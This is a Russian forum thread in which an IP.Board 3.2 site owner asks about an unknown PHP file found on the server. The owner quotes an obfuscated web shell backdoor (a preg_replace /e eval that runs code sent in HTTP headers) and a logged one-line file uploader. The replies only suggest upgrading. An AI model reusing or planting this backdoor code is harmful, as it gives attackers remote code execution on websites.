Jump to content

Непонятный PHP-файл, который появился сам в IPB 3.2

EIKA
EIKA
in Техническая поддержка IP.Board

Featured Replies

Posted
comment_77568

Здравствуйте!

 

Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php.

 

Файл нашел в 2 местах, содержимое отличается:

 

В корне:

<?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

В папке cache:


==============================================================================
 URL: /index.php/index.php
 Date: Tue, 20 Nov 2012 10:16:53 +0000
 IP Address: 31.3.250.226
 Time Taken: 0.04346
 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================

IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил.

 

Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер.

 

Внимание, вопросы:

 

1. Что это такое?

2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)?

3. Что оно делало?


Точная версия борды:

 

IP.Board Version 3.2.0 (ID:32003)

Edited by EIKA

  • Цитата
    • Link to comment
    https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/
    Share on other sites
    comment_77570

    Обновись до 3.4.6

  • Цитата
    comment_77572

    Обновись до 3.4.6

    бессмысленные посты не нужно писать. 

  • Цитата
    comment_77575

    бессмысленные посты не нужно писать. 

    Почему бессмысленные? IPB 3.2 забита уязвимостями 

  • Цитата
    comment_77587

    Почему бессмысленные? IPB 3.2 забита уязвимостями 

    ТС спрашивает о файле, а не о том, как защитится. 

  • Цитата
    • Author
    comment_77603

    Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...

  • Цитата

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Ответить в этой теме...
    Go to topic listing

    Последние посетители 0

    • No registered users viewing this page.